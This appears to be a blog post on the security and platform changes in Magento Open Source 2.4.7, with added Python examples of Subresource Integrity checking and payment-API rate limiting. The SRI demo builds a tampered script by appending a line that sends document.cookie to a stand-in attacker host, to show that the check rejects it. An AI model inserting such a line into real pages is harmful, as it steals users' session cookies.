
Security enhancements in Magento Open Source 2.4.7

Magento Open Source version 2.4.7 introduces support for PHP 8.3 and includes hundreds of quality improvements, custom attributes in GraphQL, and compatibility with FedEx and UPS services.

Magento update 2.4.7

Security Improvements

This release includes the same security fixes and platform improvements as Adobe Commerce 2.4.6-p5, 2.4.5-p7, and 2.4.4-p8. Although there have been no confirmed attacks to date, certain vulnerabilities could potentially be exploited to gain access to customer information or take over admin sessions. Most of these issues require an attacker to first gain access to the admin area. Therefore, it is essential to protect your admin area by, among other things:

  • IP whitelisting

  • Two-factor authentication

  • Using a VPN

  • Using a unique location instead of /admin

  • Good password practices

Additional Security Improvements

  • Changes to cache keys: Non-generated cache keys for blocks now include prefixes that differ from automatically generated keys. These keys can now only contain letters, numbers, hyphens (-), and underscores (_).

  • Limit on automatically generated discount codes: There is now a limit of 250,000 on the number of automatically generated discount codes. Merchants can adjust this limit via the new configuration option ‘Code Quantity Limit’ (Stores > Settings:Configuration > Customers > Promotions).

  • Optimization of default Admin URL generation: The generation of the default Admin URL has been optimized for increased randomness, making it less predictable.

  • New configuration setting for full-page cache: A new setting helps mitigate the risks associated with the endpoint {BASE-URL}/page_cache/block/esi. The default value is 100, but merchants can adjust this via the Admin (Stores > Settings:Configuration > System > Full Page Cache > Handles params size).

  • Support for Subresource Integrity (SRI): To comply with PCI 4.0 requirements, SRI support has been added for all JavaScript files on payment pages. Merchants can extend this configuration to other pages.

  • Changes in Content Security Policy (CSP): Updates and improvements have been made to the CSPs to comply with PCI 4.0 requirements. The default CSP configuration for payment pages is now ‘restrict mode’. For all other pages, the default configuration is ‘report-only mode’.

  • Rate limiting for payment information via REST and GraphQL APIs: Merchants can now configure rate limiting for payment information sent via REST and GraphQL, which helps prevent carding attacks.

  • Change in the behavior of the isEmailAvailable API: By default, this API now always returns ‘true’. Merchants can enable the original behavior by setting the option ‘Enable Guest Checkout Login’ in the Admin to ‘yes’, but this may expose customer information to unauthenticated users.
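
The Subresource Integrity item above says SRI support was added for all JavaScript files on payment pages. The following added example (illustrative code written for this article, not Magento's own implementation) shows what that protection consists of: an integrity token is the base64 of a cryptographic digest of the script bytes, and the browser refuses to execute a script whose bytes no longer match the token. The function names, the constructed `SAMPLE_JS` content and the `/static/...` path are assumptions made for the example.

```python
import base64
import hashlib
import re

# Constructed sample: the exact bytes of a payment-page script as served.
SAMPLE_JS = b"window.checkout = {init: function () { return 'ok'; }};\n"

# Digest algorithms the SRI specification accepts.
_SRI_ALGOS = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}

_TOKEN_RE = re.compile(r"^(sha256|sha384|sha512)-([A-Za-z0-9+/]+=*)$")


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the integrity token ('sha384-<base64 digest>') for a resource body."""
    if algo not in _SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = _SRI_ALGOS[algo](content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes, algo: str = "sha384") -> str:
    """Build the <script> tag that pins `content` via its integrity attribute.

    crossorigin="anonymous" is required for the check to apply to scripts
    served from another origin (for example a CDN in front of pub/static).
    """
    return (f'<script src="{src}" integrity="{sri_hash(content, algo)}" '
            f'crossorigin="anonymous"></script>')


def verify_sri(content: bytes, integrity: str) -> bool:
    """Check a fetched body against an integrity attribute the way a browser does.

    The attribute may carry several space-separated tokens. Only the tokens of
    the strongest algorithm present are consulted, and any one of them
    matching is enough. Browsers treat an attribute with no parseable token
    as absent (and load the script); this function is deliberately stricter
    and rejects it, which is the behaviour you want in a deploy-time check.
    """
    parsed = []
    for token in integrity.split():
        m = _TOKEN_RE.match(token)
        if m:
            parsed.append((m.group(1), m.group(2)))
    if not parsed:
        return False
    strongest = max(parsed, key=lambda t: int(t[0][3:]))[0]
    expected = {digest for algo, digest in parsed if algo == strongest}
    actual = sri_hash(content, strongest).split("-", 1)[1]
    return actual in expected


if __name__ == "__main__":
    tag = script_tag("/static/frontend/checkout.js", SAMPLE_JS)
    print(tag)
    tampered = SAMPLE_JS + b"fetch('https://attacker.invalid/?c=' + document.cookie);\n"
    print("original verifies:", verify_sri(SAMPLE_JS, sri_hash(SAMPLE_JS)))
    print("tampered verifies:", verify_sri(tampered, sri_hash(SAMPLE_JS)))
```

The operational consequence is that every rebuild of static content (minification, bundling, a translation change) produces different bytes and therefore a different token, so integrity values have to be regenerated as part of the deploy, never hand-maintained. Extending SRI from payment pages to other pages, as the release note allows, mainly means extending that build step.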

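The rate-limiting item above says merchants can now limit payment-information calls over REST and GraphQL to hinder carding, where a bot pushes stolen card numbers through set-payment-information calls until one authorizes. The following added example (illustrative code written for this article, not Magento's implementation, whose configuration lives in the Admin) shows the mechanism such a limit relies on: a sliding-window counter per client key, applied independently to the source IP and to the cart, so that neither a bot cycling carts from one address nor one cart hit from many addresses gets through. The limit of 5 per 60 seconds, the key choice, and the constructed `SAMPLE_TRAFFIC` are assumptions made for the example.

```python
from collections import deque


class SlidingWindowLimiter:
    """Allow at most `limit` accepted requests per `window_seconds` for each key.

    Timestamps of accepted requests are kept per key and evicted as the window
    slides. The caller passes `now` so behaviour is deterministic and testable.
    """

    def __init__(self, limit: int, window_seconds: float) -> None:
        self.limit = limit
        self.window_seconds = window_seconds
        self._hits: dict[str, deque] = {}

    def allow(self, key: str, now: float) -> bool:
        q = self._hits.setdefault(key, deque())
        cutoff = now - self.window_seconds
        while q and q[0] <= cutoff:
            q.popleft()
        if len(q) >= self.limit:
            return False  # over the limit: the payment gateway is never contacted
        q.append(now)
        return True


def guard_payment_info(req: dict, now: float,
                       per_ip: SlidingWindowLimiter,
                       per_cart: SlidingWindowLimiter) -> int:
    """Return the HTTP status for one set-payment-information call.

    Two independent limits apply: one on the source IP and one on the cart id.
    Either limit being exceeded yields 429 before any card data is processed.
    """
    if not per_ip.allow(req["ip"], now):
        return 429
    if not per_cart.allow(req["cart_id"], now):
        return 429
    return 200  # within limits: hand the payment data to the gateway


# Constructed traffic: a burst of six card attempts on one cart from one
# address, the same cart tried from a second address, then a legitimate
# retry after the window has slid past the burst.
SAMPLE_TRAFFIC = (
    [{"ip": "198.51.100.7", "cart_id": "cart-X", "t": t} for t in range(6)]
    + [{"ip": "203.0.113.9", "cart_id": "cart-X", "t": 6}]
    + [{"ip": "198.51.100.7", "cart_id": "cart-X", "t": 70}]
)


def run_simulation(traffic=SAMPLE_TRAFFIC, limit: int = 5,
                   window: float = 60.0) -> list[int]:
    """Replay `traffic` through fresh limiters and return the status per request."""
    per_ip = SlidingWindowLimiter(limit, window)
    per_cart = SlidingWindowLimiter(limit, window)
    return [guard_payment_info(r, r["t"], per_ip, per_cart) for r in traffic]


if __name__ == "__main__":
    for req, status in zip(SAMPLE_TRAFFIC, run_simulation()):
        print(f"t={req['t']:>3} ip={req['ip']:<13} cart={req['cart_id']} -> {status}")
```

The sixth attempt from the first address and the attempt from the second address both receive 429, while the retry at t=70 succeeds because the earlier hits have left the window. On the detection side, a steady stream of 429 responses on the payment endpoint is itself a useful signal that a carding run is in progress, worth alerting on even though each request was blocked.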
Platform Improvements

  • Compatibility with PHP 8.3: This release introduces support for PHP 8.3. Magento Open Source now supports both PHP 8.3 and 8.2. PHP 8.2 will be supported until December 2025. After that date, migration to PHP 8.3 is recommended.

  • Support for RabbitMQ 3.13: This release is compatible with RabbitMQ 3.13. While compatibility with RabbitMQ 3.11 and 3.12 is maintained, using version 3.13 is recommended.

  • Compatibility with Composer 2.7.x: This release is compatible with Composer 2.7.x; compatibility with Composer 2.2.x is retained.

  • Support for Varnish Cache 7.4: This release is compatible with Varnish Cache 7.4. While compatibility with versions 6.0.x and 7.2.x is maintained, using version 7.4 or version 6.0 LTS is recommended.

  • Compatibility with Elasticsearch 8.11 and OpenSearch 2.12 and 1.3: This release supports Elasticsearch 8.11 as well as OpenSearch 2.12 and 1.3.

  • Support for Redis 7.2: This release is compatible with Redis 7.2.

  • Replacing extjs with jsTree: The extjs library has been replaced with the latest version of jsTree.

  • Removal of jquery/fileUpload library: This library has been removed.

  • Update of JavaScript libraries and NPM dependencies: All JavaScript libraries and NPM dependencies in the core code of Magento Open Source have been updated to the latest available versions.

  • Update of Laminas library dependencies: All Laminas library dependencies have been updated to the latest versions compatible with PHP 8.3.

See all release notes at magento.com

Written by Mike on Nov 26, 2024
